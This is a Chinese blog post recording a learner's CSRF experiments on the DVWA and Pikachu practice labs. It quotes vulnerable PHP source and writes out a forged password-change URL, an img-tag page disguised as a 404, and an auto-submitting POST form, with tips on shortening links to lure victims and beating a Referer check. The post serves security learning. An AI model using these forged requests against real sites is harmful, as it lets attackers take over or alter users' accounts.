CSRF的学习理解和相关实验

最新推荐文章于 2021-09-17 16:29:35 发布
最新推荐文章于 2021-09-17 16:29:35 发布
阅读量325 收藏 1
点赞数
分类专栏: CSRF 文章标签: csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51954912/article/details/116465500
版权

文章目录

CSRF

CSRFf全称为:Cross-site request forgery
CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。

CSRF的攻击原理

流程:
步骤一:
用户user登录浏览正规浏览器A,浏览器A通过用户的验证,并且在用户中产生cookie。
步骤二
恶意浏览器B通过各种方式,在浏览器A中放入链接,使用户user访问恶意网站B。
步骤三
用户user访问浏览器B后,浏览器B就会拿到user的cookie,并访问浏览器A,发出操作请求。
步骤四
浏览器A无法识别操作请求是user发出还是浏览器B发出,因此,浏览器A会响应浏览器B的请求。这样,就达到了模拟用户的目的。
个人理解:CSRF没有拿到用户权限,而是直接通过用户权限完成攻击。这点与·XSS不同,XSS是拿到用户权限,进行攻击。

使用DVWA 进行试验

low等级

查看源码


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

可以明白只进行了$pass_new == $pass_conf判断,还有一个防sql注入函数的过滤,没有进行任何的验证(大佬写的,我搬运一手,属是看不明白)

在这里插入图片描述
首先更改密码,然后用burp抓包
在这里插入图片描述
构造payload

http://192.168.147.1/DVWA-master/vulnerabilities/csrf/?password_new=3333&password_conf=3333&Change=Change

然后
新建一个html文件

<img src="http://192.168.147.1/DVWA-master/vulnerabilities/csrf/?password_new=3333&password_conf=3333&Change=Change"/>

<h1>404<h1>

<h2>file not found.<h2>

在这里插入图片描述

点开后,就能够发现自己的密码被更改(但是我的没有被改,不知道为什么)
当然,那么长的网址,有点呆,那么就需要在网上找一个短网址的转换器,把长的网址转换为短网址,然后可任意简单的做一个HTML让受害人直接点进去,即可。
或者,直接
在这里插入图片描述生成csrf,在代理浏览器上也可以
不知道为什么,我在代理浏览器上直接登录就行,复制HTML在别的浏览器就不行,离谱。

Medium等级


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

可以看出,和low等级的代码多了个判断
$_SERVER中HTTP_REFERER有SERVER_NAME的值时候,则进行修改密码操作。
(抄的大佬的…)

 $_SERVER['HTTP_REFERER'] #链接到当前页面的前一页面的 URL 地址。
 $_SERVER['SERVER_NAME'] #当前运行脚本所在服务器主机的名称。

因此,只需要将.html文件修改为dvwa.com.html即可。
以上都为get的类型
也没有实战演练,等到学习到实战的时候,在来写一波。

CSRF再学习之pikaqiu靶场

get型

在这里插入图片描述
首先使用pikaqiu提供的用户登录
密码是123456

在这里插入图片描述
修改个人信息
在这里插入图片描述修改,并且使用burp抓包
在这里插入图片描述
在这里插入图片描述
生成CSRF

在这里插入图片描述用浏览器测试,点击下图按钮,就会被更改个人信息
在这里插入图片描述
在这里插入图片描述

post型

如果是post型,那么所有请求在表单上提交。

可以自己搭建一个站点,在站点上做一个表单,诱导lucy点击这个链接,当用户点击时,就会自动向存在CSRF的服务器提交POST请求修改个人信息
我原来是
在这里插入图片描述
这样的,在本地写一个html表单

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title> csrf</title>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"  method="post">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="12345678922" />
    <input id="add" type="text" name="add" value="hacker" />
    <input id="email" type="text" name="email" value="lucy@pikachu.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

点开就能发现信息被更改了
不知道怎么回事,我的是显示不出来,而且会跳转到一个不存在的页面。
…问题不知道在哪
在这里插入图片描述

Token

用burp抓包,可以发现多了个token
在这里插入图片描述
token:随机码,每次请求,都增加一个随机码,后台每次对这个随机码进行验证
在这里插入图片描述
对比上图,每次的token都会改变
并且,token每次提交后都会失效,所以当攻击者拿到user的token时,此token已经失效。
所以CSRF的防御也就成功了。

卡面来打01
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
csrf实验
weixin_33708432的博客
06-22 500
CSRF攻击实验 CSRF攻击涉及用户受害者,受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到为受信任的站点,从而破话用户的信息。 CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害...
SeedLabs-Web安全-CSRF实验
Anonymity
06-23 2793
SeedLabs-Web安全-CSRF实验 文章目录SeedLabs-Web安全-CSRF实验前言一、Task1 熟悉SQL语句1. 观察HTTP请求2.使用基本的SQL语句二、Task2 SQL注入攻击之select2.1 网页SQL注入攻击。2.2 来自命令行的SQL注入攻击。2.3 添加一条新的SQL语句。三、SQL注入攻击之UPDATE3.1 修改自己的薪水。3.2 修改他人工资四、Countermeasure — Prepared Statement 前言 CSRF注入的实验记录 提示:以
pikachu--CSRF实验演练
m0_54024658的博客
06-18 423
CSRF概述 Cross-site request forgery 简称为“CSRF”,中文名称==跨站请求伪造==在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 CSRF与XSS的区别 CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的
CSRF攻击实验 ——合天网安实验学习笔记
weixin_42582241的博客
02-27 2201
实验链接 本实验以PHP和Mysql为环境,展示了CSRF攻击的原理和攻击过程。通过实验结果结合对攻击代码的分析,可更直观清晰地认识到Web安全里这种常见的攻击方式。 链接:http://www.hetianlab.com/expc.do?ce=5984201a-5b7e-42c2-959b-6e4cdfdb932c 实验简介 实验所属系列:web攻防 实验对象:本科/专科信息安全专业 实验类别:...
CSRF实验演示
北冥有鱼
04-29 1080
我们来到pikachu 我们先登陆一下lucy 帮她改个住址玩玩 我们可以在burp上看到我们刚刚抓得到get请求 我们能发现这个get请求是向后台发送了所有的参数 所以我们可以根据上次讲的小黑的思路,把地址改成66666,发给lucy 把地址补全 那么现在假如lucy在登陆态访问了这个链接 我们发现,这个地址就被改过来了 刷新以后的页面 因为这是get型的请求,所以这是get型的...
web课程的实验课所有
05-29
【标题】"Web课程的实验课所有"涵盖了Web开发的基础知识和实践经验,是学习Web技术的重要环节。在Web课程中,实验课通常包括了HTML、CSS、JavaScript等基础语言的学习,以及服务器端编程、数据库交互、前端框架应用...
软件安全分析与应用实验报告
01-05
实验旨在通过实际操作和靶场练习,使学生理解并掌握软件安全分析的基本技能,包括软件漏洞检测、逆向工程原理以及工具的使用,如odbug。 一、Web安全 Web安全主要关注Web应用程序的安全性,因为它们是黑客攻击的...
Web系统与技术实验指导书源码
04-13
实验指导书则提供了具体的学习路径和实践项目,让学生能够在动手实践中学习和掌握这些技术。 书中可能涵盖以下关键知识点: 1. **HTML**: HTML(HyperText Markup Language)是构建网页内容的基础,用于描述页面...
哈工大威海,电子商务实验源程序
05-07
【哈工大威海,电子商务实验源程序】是一个与电子商务领域相关学习资源,它包含了完整的源代码,供学生或研究人员深入理解和实践电子商务系统的设计与开发。这个实验项目旨在帮助学习者掌握电子商务系统的各种核心...
web实验报告 实验参考
07-05
实验报告是学习过程中对理论知识的实践验证和深入理解,其中可能包含以下内容: 1. **Web基础**:实验可能会涉及HTTP协议的理解,包括HTTP请求和响应的工作原理,以及状态码的意义。同时,HTML和CSS用于构建网页...
Web安全第三次实验(CSRF,XSS,点击劫持).rar
12-26
文件中包含myzoo,csrf.html,xss.txt,hijack.html.其中myzoo是测试网站,csrf需要在测试网站中的profile中设置超链接,xss攻击则直接可以将xss.txt内容复制到profile中,点击劫持也是需要设置超链接。
CSRF检测工具
12-09
CSRFTester是一款CSRF检测工具 .
Pikachu-CSRF
baynk的博客
11-18 1262
0x00 CSRF概述 如果知道CSRF的就可以不用看了,这篇一点技术含量都没。。。纯属为了保证阵型才写。 CSRF(跨站请求伪造)概述 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。...
Cross-site request forgery攻击方式
qq_41499808的博客
09-21 3949
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全。 三.CSRF漏洞现状 CSRF这种攻击方式在2000年
实验33:csrf漏洞概述及原理
qq_44720671的博客
04-29 277
csrf漏洞概述及原理 csrf全称为:Cross-site request forgery 正常情况下,某人A想要修改自己的个人信息,需要登录(得到权限),再点击提交(修改请求),这样就完成了修改。 若另一个人B想要修改A的个人信息,就需要有A的权限,可以将修改个人信息的请求进行修饰,引诱A在登录状态下点击,攻击成功! 成功原因: 1、该网站没有进行防CSRF漏洞处理,导致请求容易被伪造。 因...
CSRF漏洞原理与防御方式
dreamthe的博客
09-17 2015
CSRF漏洞原理 CSRF被叫做跨站请求伪造,该怎么理解这句话呢,比如 用户a在浏览器登录了账号,当他发送登录请求时候,服务器验证了账号密码,会返回给一个身份信息存放在cookie里面,浏览器保存,那么以后用户访问服务器带着这个cookie就行了。那么怎么产生攻击的呢,是用户在已经登录的状态下,访问了一个恶意的网站,带浏览器保存的cookie值向服务器发送了恶意请求,服务器会以为是用户的请求,其实这是用户不知情的请求。垮了两个站,一个是用户登录实际网站,一个屙屎攻击者恶意构造网站,所以称作跨站请求伪造。
漏洞复现篇——CSRF漏洞的利用
热门推荐
爱国小白帽
02-25 1万+
CSRF漏洞原理 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击...
命令执行+CSRF
11-04
本节课程分两个方面,命令执行包含os命令执行、struts2远程命令执行、变量覆盖。CSRF漏洞包含GET型及POST型两种类型的CSRF漏洞,每种漏洞不仅包含原理分析还包含攻击过程演示。
复现关于dvwa的CSRF-token绕过实验
最新发布
05-20
DVWA是一个非常流行的Web漏洞测试平台,其中包含了很多Web漏洞的实验,包括CSRF攻击。 下面是实现DVWA CSRF-Token绕过实验的步骤: 1. 下载和安装DVWA 你可以从官方网站下载DVWA:http://www.dvwa.co.uk/。然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值